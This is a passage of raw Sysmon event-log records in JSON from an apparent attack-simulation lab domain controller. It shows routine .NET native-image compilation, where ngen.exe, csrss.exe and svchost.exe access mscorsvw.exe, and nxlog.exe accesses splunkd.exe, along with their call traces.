C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.341","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-00105B9F0C00}","TargetProcessId":"3144","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7814,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.341\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-00105B9F0C00}\r\nTargetProcessId: 3144\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.341","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-00105B9F0C00}","TargetProcessId":"3144","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7815,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.356\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-00105B9F0C00}\r\nTargetProcessId: 3144\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.356","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-00105B9F0C00}","TargetProcessId":"3144","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7816,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.637\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.637","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7817,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:15.637\r\nProcessGuid: {E2A3D6B1-133B-5F25-0000-00105B9F0C00}\r\nProcessId: 3144\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c48-0\\Microsoft.VisualBasic.Compatibility.Data.dll\r\nCreationUtcTime: 2020-08-01 07:01:15.637","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:15.637","ProcessGuid":"{E2A3D6B1-133B-5F25-0000-00105B9F0C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c48-0\\Microsoft.VisualBasic.Compatibility.Data.dll","CreationUtcTime":"2020-08-01 07:01:15.637","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7818,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.684\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001045A50C00}\r\nTargetProcessId: 4572\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.684","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001045A50C00}","TargetProcessId":"4572","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7819,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.684\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001045A50C00}\r\nTargetProcessId: 4572\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.684","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001045A50C00}","TargetProcessId":"4572","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7820,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.684\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001045A50C00}\r\nTargetProcessId: 4572\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.684","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001045A50C00}","TargetProcessId":"4572","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7821,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.716\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001026A80C00}\r\nTargetProcessId: 3280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 